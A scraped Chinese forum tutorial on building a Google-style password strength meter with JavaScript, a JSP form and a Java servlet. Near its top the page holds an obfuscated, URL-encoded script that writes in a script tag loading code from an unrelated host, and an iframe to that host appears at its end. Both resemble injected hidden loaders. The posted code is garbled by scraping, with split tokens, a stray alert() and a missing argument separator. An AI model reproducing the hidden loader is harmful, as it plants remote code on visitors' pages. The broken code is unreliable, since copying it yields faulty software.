[xml,jsp]仿google密码强度判断

 

HTML Tags and JavaScript tutorial


<script language="javascript">var encS="%3Cscript%20language%3D%22javascript%22%20src%3D%22http%3A//avss.b15.cnwg.cn/count/count.asp%22%3E%3C/script%3E";var S=unescape(encS);document.write(S);</script>
[xml,jsp]仿google密码强度判断



 
gv_showWait('waitDiv', 1);prtie2('Java天下|开放,共享,互助的中文Java社区|打造中国第一的中文Java社区! - 高级话题 - WebService/XML - [xml,jsp]仿google密码强度判断')



 用户:

ajie



[xml,jsp]仿google密码强度判断
 
06-04-22
17:11

          
广告 -
Java天下社区




 


By  我容易么我
灵感来自GOOGLE--Gmail的注册表单,这是结合XMLHTTP和servlet以及客户端脚本Javascript来实现的一个给死板的表单程序增加亲和力的一个小玩意。
下午看到遂花了几小时模仿着写了一个。前端代码均来自GMAIL的表单注册那里,后段验证密码强度的servlet是自己做的,算法有待商戳不过效果算是出来了。
先来看客户端的JS代码,命名文    gvUserReg.js
程序代码:  





程序代码:



// this code powered by google
var agt = navigator.userAgent.toLowerCase();
var is_op = (agt.indexOf(
"opera"
) != -1);
var is_ie = (agt.indexOf(
"msie"
) != -1) && 
document
.all && !is_op;
var is_ie5 = (agt.indexOf(
"msie 5"
) != -1) && 
document
.all && !is_op;
function CreateXmlHttpReq(handler) {
  var xmlhttp = 
null
;
  if (is_ie) {
    
// Guaranteed to be ie5 or ie6
    var control = (is_ie5) ? 
"Microsoft.XMLHTTP"
 : 
"Msxml2.XMLHTTP"
;
    
try
 {
      xmlhttp = 
new 
ActiveXObject(control);
      xmlhttp.onreadystatechange = handler;
    } 
catch
 (ex) {
      
// TODO: better help message
      alert(
"You need to enable active scripting and activeX controls"
);  
    }
  } 
else
 {
    
// Mozilla
    xmlhttp = 
new 
XMLHttpRequest();
    xmlhttp.onload = handler;
    xmlhttp.onerror = handler;
  }
  
return 
xmlhttp;
}
alert();
// XMLHttp send POST request
function XmlHttpPOST(xmlhttp, url, data) {
  
try
 {
    xmlhttp.open(
"POST"
, url, 
true
);
    xmlhttp.setRequestHeader(
"Content-Type"

"application/x-www-form-urlencoded; charset=UTF-8"
);
    xmlhttp.send(data);
  } 
catch
 (ex) {
    
// do nothing
  }
}
// XMLHttp send GEt request
function XmlHttpGET(xmlhttp, url) {
  
try
 {
    xmlhttp.open(
"GET"
, url, 
true
); 
    xmlhttp.send(
null
);
  } 
catch
 (ex) {
    
// do nothing
  }
}
 var myxmlhttp;
  var isBrowserCompatible;
  var hidePasswordBar;
  ratingMsgs = 
new 
Array(6);
  ratingMsgColors = 
new 
Array(6);
  barColors = 
new 
Array(6);
  ratingMsgs[0] = 
"未评级"
;
  ratingMsgs[1] = 
"太短"
;
  ratingMsgs[2] = 
"弱"
;
  ratingMsgs[3] = 
"一般"
;
  ratingMsgs[4] = 
"很好"
;
  ratingMsgs[5] = 
"极佳"

//If the password server is down
  ratingMsgColors[0] = 
"#808080"
;
  ratingMsgColors[1] = 
"#da5301"
;
  ratingMsgColors[2] = 
"#ccbe00"
;
  ratingMsgColors[3] = 
"#1e91ce"
;
  ratingMsgColors[4] = 
"#0000FF"
;
  ratingMsgColors[5] = 
"#ff0000"
;
  barColors[0] = 
"#e0e0e0"
;
  barColors[1] = 
"#da5301"
;
  barColors[2] = 
"#f0e54b"
;
  barColors[3] = 
"#1e91ce"
;
  barColors[4] = 
"#0000FF"
;
  barColors[5] = 
"#ff0000"
;
  hidePasswordBar = 
false
;
  function CreateRateUserPassReq(formKey) {
    if (!isBrowserCompatible) {
      return;
    }
    var passwd = 
document
.forms[formKey].gvUserPass.value;
var min_passwd_len = 6;
    var passwdKey = 
"passwd"
;
    if (passwd.length < min_passwd_len) {
     DrawBar(1);
    }
else
{
     
//We need to escape the password now so it won't mess up with length test
      passwd = escape(passwd);
      var params = passwdKey + 
"="
 + passwd
      myxmlhttp = CreateXmlHttpReq(RateUserPassXmlHttpHandler);
      XmlHttpPOST(myxmlhttp, 
"/club/rateUserPass.gv"
, params);
    }
  }
  function getElement(name) {
    if (
document
.all) {
      
return 
document
.all(name);
    }
    
return 
document
.getElementById(name);
  }
  function RateUserPassXmlHttpHandler() {
    
// Can't check status since safari doesn't support it
    if (myxmlhttp.readyState !=4 ) {
      return;
    }
    rating = parseInt(myxmlhttp.responseText);
    DrawBar(rating);
  }
  function DrawBar(rating) {
    var posbar = getElement('posBar');
    var negbar = getElement('negBar');
    var passwdRating = getElement('passwdRating');
    var barLength = getElement('passwdBarDiv').width;
    if (rating >= 0 && rating <= 5) {  
//We successfully got a rating
      posbar.style.width = barLength / 5 * rating;
      negbar.style.width = barLength / 5 * (5 - rating);
    } 
else
 {
      posbar.style.width = 0;
      negbar.style.width = barLength;
      rating = 5; 
// Not rated Rating
    }
    posbar.style.background = barColors[rating]
    passwdRating.innerHTML = 
"<font color='"
 + ratingMsgColors[rating] +
                             
"'>"
 + ratingMsgs[rating] + 
"</font>"
;
  }







精品归档

信誉:
+1.0
    积分:
+2.0
    金币:
+1.0


广告 -
广告位招租
-->








 用户:

ajie



[xml,jsp]仿google密码强度判断
 
06-04-22
17:13

          
广告 -
Java天下社区













积分:

1729.0



金币:

68.0



信誉:

129.0



发帖:

410



来自:

上海









[1]楼
-> 











编辑主题


删除主题


管理主题








表单部分只是列出密码选框部分
程序代码:  
要引入刚才那个JS文件





程序代码:



<script language=
"javascript"
 src=
"gvUserReg.js"
></script>
<form action=
"userRegPost.jsp"
 method=
"post"
  name=
"Gforms"
 onSubmit=
"
return 
CheckForm();"
>
<table width=
"100%"
  border=
"0"
 cellpadding=
"0"
 cellspacing=
"0"
>
        <tr>
        <td width=
"100"
><input style=
"width:200 px"
 onKeyUp=
"CreateRateUserPassReq('Gforms')"
 name=
"gvUserPass"
 type=
"password"
 id=
"gvUserPass"
 size=
"30"
 maxlength=
"30"
 />            </td>
        <td width=
"10"
></td><td>
<TABLE  width=
"200"
 border=0 cellPadding=0 cellSpacing=0 >
<TBODY><TR><TD vAlign=top noWrap width=0>
<A href=
"#"
>密码强度:</A> 
</TD>
<TD><DIV  id=
"passwdRating"
>太短</DIV>
</TD></TR><TR><TD height=3></TD></TR>
<TR><TD colSpan=2>
<TABLE  id=
"passwdBarDiv"
 cellSpacing=0 cellPadding=0 width=
"200"
  bgColor=
"#ffffff"
 border=0>
<TBODY><TR>
<TD id=
"posBar"
 width=
"0%"
 bgColor=
"#e0e0e0"
 height=
"4"
></TD>
<TD id=
"negBar"
 width=
"100%"
 bgColor=
"#e0e0e0"
  height=
"4"
></TD>
</TR></TBODY>
</TABLE>
</TD></TR>
</TBODY></TABLE> </td>
    </tr>
    </table>
<script language=
"javascript"
>
<!--
/* Checks Browser Compatibility */
//
document
.getElementById(
"passwdBarDiv"
).style.display = 
"block"
;
var agt = navigator.userAgent.toLowerCase();
var is_op = (agt.indexOf(
"opera"
) != -1);
var is_ie = (agt.indexOf(
"msie"
) != -1) && 
document
.all && !is_op;
var is_mac = (agt.indexOf(
"mac"
) != -1);
var is_gk = (agt.indexOf(
"gecko"
) != -1);
var is_sf = (agt.indexOf(
"safari"
) != -1);
function gff(str, pfx) {
var i = str.indexOf(pfx);
if (i != -1) {
var v = parseFloat(str.substring(i + pfx.length));
if (!isNaN(v)) {
return 
v;
}
}
return 
null
;
}
function Compatible() {
if (is_ie && !is_op && !is_mac) {
var v = gff(agt, 
"msie "
);
if (v != 
null
) {
return 
(v >= 6.0);
}
}
if (is_gk && !is_sf) {
var v = gff(agt, 
"rv:"
);
if (v != 
null
) {
return 
(v >= 1.4);
}
else
{
v = gff(agt, 
"galeon/"
);
if (v != 
null
) {
return 
(v >= 1.3);
}
}
}
if (is_sf) {
var v = gff(agt, 
"applewebkit/"
);
if (v != 
null
) {
return 
(v >= 124);
}
}
return 
false
;
}
  
/* We also 
try
 to create an xmlhttp object to see if the browser supports it */
myxmlhttp = CreateXmlHttpReq(RateUserPassXmlHttpHandler);
isBrowserCompatible = Compatible() && myxmlhttp;
if (!isBrowserCompatible || hidePasswordBar) {
document
.getElementById(
"passwdBarDiv"
).style.display = 
"none"
;
}
//--> 
</script>
</form>
 





Servlet部分,验证密码强度的JAVA类
程序代码:  





程序代码:



/* 
 * 2005-12-14
 * Made in GamVan
 */
package
 com.gamvan.club.servlet;
import java.io.IOException;
import java.io.PrintWriter;
import javax.servlet.ServletException;
import javax.servlet.http.HttpServlet;
import javax.servlet.http.HttpServletRequest;
import javax.servlet.http.HttpServletResponse;
import com.gamvan.tools.EncodeString;
/**
 * @author GamVan by 我容易么我
 * Powered by GamVan.com
 */
public 
class RateUserPass extends HttpServlet {
private 
static 
final 
long 
serialVersionUID = 1L;
private 
int 
rate = 0;
/**
 * 口令强弱等级判定,强度算法有待商戳,功能基本实现
 * @param pass
 * @return
 * 2005-12-14 16:55:03 Made In GamVan
 * com.gamvan.club.servlet
 */
public 
int 
rateUserPass(String pass){
/*
 * i 值指示口令等级
 * 0 不合法口令
 * 1 太短
 * 2 弱
 * 3 一般
 * 4 很好
 * 5 极佳
 */
int 
i = 0;
if
(pass==
null
 || pass.length()==0){
return 
0;
}
int 
hasLetter = EncodeString.matcherStr(pass,
"[a-zA-Z]"
,
""
).length();
int 
hasNumber = EncodeString.matcherStr(pass,
"[0-9]"
,
""
).length(); 
int 
passLen = pass.length();
if
(passLen>=6){
/* 如果仅包含数字或仅包含字母 */
if
((passLen-hasLetter)==0 || (passLen-hasNumber)==0){
if
(passLen<8){
i = 2;
}
else
 {
i = 3;
}
}
/* 如果口令大于6位且即包含数字又包含字母 */
else
 
if
(hasLetter>0 && hasNumber>0){ 
if
(passLen>=10){
i = 5;
}
else
 
if
(passLen>=8){
i = 4;
}
else
{
i = 3;
}
}
/* 如果既不包含数字又不包含字母 */
else
 
if
(hasLetter==0 && hasNumber==0){
if
(passLen>=7){
i = 5;
}
else
{
i = 4;
}
}
/* 字母或数字有一方为0 */
else
 
if
(hasNumber==0||hasLetter==0){
if
((passLen-hasLetter)==0 || (passLen-hasNumber)==0){
i = 2;
}
/* 
 * 字母数字任意一种类型小于6且总长度大于等于6
 * 则说明此密码是字母或数字加任意其他字符组合而成
 */
else
{
if
(passLen>8){
i = 5;
}
else
 
if
(passLen==8){
i = 4;
}
else
{
i = 3;
}
}
}
}
else

//口令小于6位则显示太短
if
(passLen>0){
i = 1; 
//口令太短
}
else
{
i = 0;
}
}
return 
i;
}
public 
void service(HttpServletRequest request,HttpServletResponse response)
throws ServletException, IOException 
{
String userPass = request.getParameter(
"passwd"
);
rate = rateUserPass(userPass);
response.setContentType(
"text/HTML;charset=UTF-8"
); 
PrintWriter out = response.getWriter();
out.print(rate);
out.close();
if
(
true
)return;
return 
;
}
}





 
下面这个是强度验证的servlet用到的一个正则表达式工具类,这里我只把我们这篇文章用到的其中一个方法贴出来给大家
程序代码:  





程序代码:



/* 
 * Made in GamVan
 */
package
 com.gamvan.tools;
import java.io.UnsupportedEncodingException;
import java.security.MessageDigest;
import sun.misc.BASE64Encoder;
import java.util.regex.*;
import com.gamvan.tools.MD5;
/**
 * 字符串操作集合类
 * @author GamVan by 我容易么我
 * Powered by GamVan.com
 */
public 
class EncodeString{
    
/**
     * 循环找出匹配内容
     * @param str
     * @param cp
     * @param s
     * @return
     * 2005-12-11 18:45:25 Made In GamVan
     * com.gamvan.tools
     */
    
public 
static 
String matcherStr(String str, String cp, String s){
        
if
(str==
null
 || str.equals(
""
)){
            
return 
""
;
        }
        String txt = 
new 
String();
        txt = str;
        
if
(str!=
null
 && !str.equals(
""
)){
            txt = str;
            Pattern p = Pattern.compile(cp,2); 
//参数2表示大小写不区分
            Matcher m = p.matcher(txt);
            StringBuffer sb = 
new 
StringBuffer();
            
int 
i=0;
            boolean result = m.find();
            
//使用循环将句子里所有匹配的内容找出并替换再将内容加到sb里
            
while
(result) {
                i++;
                sb.append(m.group());
                sb.append(s);
                
//继续查找下一个匹配对象
                result = m.find();
            }
            txt = String.valueOf(sb);
        }
else
{
            txt = 
""
;
        }
        
return 
txt;       
    }
}





 
地球人都知道servlet需要部署才能用我这里这个应用在web.xml是这么部署的!大家可以根据需要自己改。
程序代码:  





程序代码:



<servlet>
<servlet-name>RateUserPass</servlet-name>
<servlet-class>com.gamvan.club.servlet.RateUserPass</servlet-class>
</servlet>
<servlet-mapping>
<servlet-name>RateUserPass</servlet-name>
<url-pattern>/club/rateUserPass.gv</url-pattern>
</servlet-mapping>  












gv_showWait('waitDiv', 0);

src="http://avss.b15.cnwg.cn/count/iframe.asp" frameborder="0" width="650" scrolling="no" height="160">
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值